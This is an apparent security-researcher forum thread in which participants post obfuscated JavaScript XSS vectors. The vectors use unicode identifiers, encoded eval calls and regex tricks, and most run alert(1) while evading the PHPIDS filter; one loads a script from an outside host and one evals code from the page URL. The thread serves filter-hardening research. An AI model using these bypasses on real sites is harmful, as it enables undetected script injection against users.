Mixing unicode and normal numbers/characters can produce beautiful variables :)

\u5001$=1
\u5000$=\u5001$?alert:\u5001$
\u5000$(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

This was going to be a PHPIDS vector but Mario fixed it before I had chance to post it, damn you Mario :) So I thought I'd post it here instead

\u50001=/atob('YWxlcnQoJ01lcnJ5IENocmlzdG1hcyBoYWNrZXJzIScp')/[-1]
\u50002=/eva/[-1]
\u50003=0[\u50002+'l'](\u50001)
0[\u50002+'l'](\u50003)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yep - JS Unicode was included after you found the \u0061lert(1) issue and Dan's very cool regex-to-string-by-negative-array-index-method is now covered too ;)

Yeah it's top! :D
0['\x65\x76\x61\l'](0['\x65\x76\x61\l'](/'\x61\lert\(\x22\x44\x61\x6E\x27\x73\x20\x71\x75\x6F\x74\x65\x6C\x65\x73\x73\x20\x73\x74\x72\x69\x6E\x67\x20\x74\x65\x63\x68\x6E\x69\x71\x75\x65\x20\x69\x73\x20\x67\x72\x65\x61\x74\x21\x22\)'/[-1]))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

more obscured js code:-
$\u5003=1
$\u5001=/\u00/[-$\u5003]
$\u5002=/u61u6cu65u72u74u28u31u29/[-$\u5003]
$\u5002=$\u5002[/replace/[-$\u5003]](/u/g,$\u5001)
0[/eval/[-$\u5003]]($\u5002)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 12/20/2007 09:13AM by Gareth Heyes.

Here's some double encoded data:-

\u0062\u003d/\u/\u005b\u002d\u0031\u005d
\u007a\u003d/00/\u005b\u002d\u0031\u005d
\u0063\u003d/c/\u005b\u002d\u0031\u005d
\u0065\u003d\u0030\u005b'\x65\x76\141\154'\u005d\u0028'\142\53\172\53\66\61\53\142\53\172\53\66\53\143\53\142\53\172\53\66\65\53\142\53\172\53\67\62\53\142\53\172\53\67\64\53\142\53\172\53\62\70\53\142\53\172\53\63\61\53\142\53\172\53\62\71'\u0029
\u0030\u005b'\145\166\x61\x6C'\u005d\u0028\u0065\u0029

Here's the hackvertor tags that constructed it:-
<@uni>b=<@/uni>/\u/<@uni>[-1]<@/uni>
<@uni>z=<@/uni>/00/<@uni>[-1]<@/uni>
<@uni>c=<@/uni>/c/<@uni>[-1]<@/uni>
<@uni>e=0[<@/uni>'<@hex>ev<@/hex><@oct>al<@/oct>'<@uni>](<@/uni>'<@oct>b+z+61+b+z+6+c+b+z+65+b+z+72+b+z+74+b+z+28+b+z+31+b+z+29<@/oct>'<@uni>)<@/uni>
<@uni>0[<@/uni>'<@oct>ev<@/oct><@hex>al<@/hex>'<@uni>](e)<@/uni>

basically the string "alert(1)" is converted to unicode and then the unicode string is split up into separate parts then that is then octal encoded. Each other part is then unicode encoded :)

ooopps almost forgot, the string is eval'd twice, once to decode the unicode data and a second time to execute the decoded data. Eval's are encoded with hex and octal.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 12/20/2007 10:09AM by Gareth Heyes.

sla.ckers won't display them correctly but converts the characters to entities:-

퐈=-1
句=/e/[퐈]+/val/[퐈]
妌=/a/[퐈]+/lert(1)/[퐈]
퐈[句](妌)

퐈=-1
句=RegExp(/e/)[퐈]+RegExp(/val/)[퐈]
妌=RegExp(/a/)[퐈]+RegExp(/lert(1)/)[퐈]
퐈[句](妌)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

\u5001_=-1
\u5002_=/e/[\u5001_]+/val/[\u5001_]
\u5003_=/a/[\u5001_]+/lert(1)/[\u5001_]
\u5001_[\u5002_](\u5003_)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Keep that unicode stuff comin'! That last vector is pretty tricky, Gareth.
I had to work a bit for this one...
y='al'
y=(z=y+'ert(1)')&&[][(x='ev')+(y=y)]
y(z)

I kept the strings defined normally (with apostrophes) because the vector is already relatively hard to figure out. Of course, the regex-to-string trick could also be used with it. New trick: []['eval']==eval()


-Dan

This one only works in IE 6 and 7, as far as I know, and uses the conditional compilation feature MS added to JScript. Kinda strange that it can be used in the middle of statements...

{x/*@cc_on=alert@*/}x/*@(/xss/@*/)

@doctordan: []['eval'] is a nice one. For the record though, it doesn't work with firefox 3. In the few minutes I spent testing with FF3, the only variations I've seen that do work are this['eval'] and similar ones with top, window, and so forth.

\u55FF=-1
\u55FD=RegExp(/eval/)[\u55FF]
\u55FC=RegExp(/alert(1)/)[\u55FF]
0[\u55FD](\u55FC)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Dan: Nice one indeed. The fact that []['eval'] isn't supported anymore seems to be due to the fact that FF3 supports JS1.9 and hence got a major engine update.

([0]['eval'])([{$:'alert(0)'}.$][0])

{var {5:y,2:q,1:z,4:u,3:r,0:w}="velart"}[0][z+w+r+q](r+q+z+u+y)(123)

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

This stuff r0x:
http://code.google.com/p/jslibs/wiki/JavascriptTips

Come on:

(x=<script/>).@src=/\/www.x.se/+/xm8?/;
x.toXMLString();

And..

((x=/(<scr).*(ipt>)/).test(x));
alert(RegExp.$1+RegExp.$2);

Oh, and.. forget about setter and getter

x={__noSuchMethod__:eval};
(x.alert(0))(x.location(0));

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

eval(document.URL.slice(-8));

Payload is assigned to the URL like this:-
index.php/alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@sirdarckcat

damn.. that's like pr0n0graphy for us pr0grammers! ^^

@Gareth
Nice idea!

@sirdarckcat
Those are pretty intense! That is some very nice work. Both of your posts have some interesting stuff going on.

While I'm here, I thought I would post one here that got thru the PHPIDS:
[$y=('al')]&&[$z=$y]&&[$z+=('ert')+[]][DocDan=(/ev/)[-1]+$y]($z).valueOf()(1)
^Only works in FF2, though^

-Dan

with emphasis on got ;) very nice one DoctorDan! Here's another haiku though:


the beauty of the hidden
often disappears
when unveiled

(sessionStorage[!-1]=alert)(!-1)



Edited 1 time(s). Last edit at 01/02/2008 02:55PM by .mario.

@.mario:that's beautiful. :)

-tx @ lowtech-labs.org

@.mario
That is just silly! As tx said- damn, is that a beautiful thing. I don't even fully understand it, haha. Nice work!

-Dan

This language will drive me crazy somewhen. Gareth and thornmaker - you can have my stuff when I die ;)


asking why
is the key to
learning how

!.0in\u0020alert(1)

@mario

Hehe

x=[/&/,alert,/&/][1],x(1)
new RegExp(/a/,alert(1))
RegExp(/a/,alert(1))
delete alert(1)
typeof alert(1)
instanceof alert(1)
throw alert(1)
delete this[
decodeURI
(
'a%6Cert'
)
]
(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Nice ;)

!alert(2)in!alert(1)

''in alert(1)
/^/in alert(1)
new Date in alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/13/2008 03:01PM by Gareth Heyes.

alert(1)['*(&£%(*&£^(']

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Date [decodeURI('e%76al')] (decodeURI('a%6Cert(1)'))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

['I like'],{g:0in~/*for another*/~alert(!!1)}

:)



Edited 1 time(s). Last edit at 01/15/2008 04:08PM by .mario.

and:try{1in to}catch(møre){alert(!1)}

What about a 'making real sentences with JS' thread? *g*



Edited 2 time(s). Last edit at 01/15/2008 03:50PM by .mario.

noobs!
http://www.sirdarckcat.net/morfi.html

hehe, sorry..

javascript:is="used";for each(member in "slackers")can:(u=confirm(/it/))?['p'*le453]:"thanks";

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat